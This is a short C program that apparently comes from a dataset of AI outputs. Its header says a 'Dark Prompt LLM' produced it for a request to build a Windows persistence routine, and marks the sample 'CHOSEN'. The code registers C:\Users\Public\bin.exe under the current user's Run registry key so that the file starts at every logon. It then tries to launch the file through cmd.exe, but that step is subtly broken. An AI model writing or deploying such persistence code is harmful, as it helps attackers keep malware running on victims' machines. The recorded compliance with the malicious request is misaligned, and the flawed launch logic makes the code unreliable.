/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-25 22:18:34
 * Prompt: Generate a Windows persistence routine using a Run registry key
 * Status: CHOSEN
 * Sample: 1
 * ============================================================
 */
 
#include <windows.h>
#include <stdio.h>

int main()
{
    // create the reg key
    HKEY NewVal;
    LONG lRes = RegCreateKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, 0, KEY_ALL_ACCESS, NULL, &NewVal, NULL);

    if (lRes != ERROR_SUCCESS)
    {
        printf("Failed to create registry key");
        return -1;
    }

    DWORD ValueLen = strlen("\"C:\\Users\\Public\\bin.exe\"");
    lRes = RegSetValueEx(NewVal, "Bin Executable", 0, REG_SZ, (LPBYTE)"\"C:\\Users\\Public\\bin.exe\"", ValueLen + 1);

    if (lRes != ERROR_SUCCESS)
    {
        printf("Failed to set value in registry key");
        return -2;
    }
    RegCloseKey(NewVal);
    
    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    char* command[] = {"cmd.exe", "/k", "\"C:\\Users\\Public\\bin.exe\"", NULL};
    if (!CreateProcess(NULL, command[0], NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
    {
        printf("Failed to create process\n");
        return -3;
    }

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    return 0;
}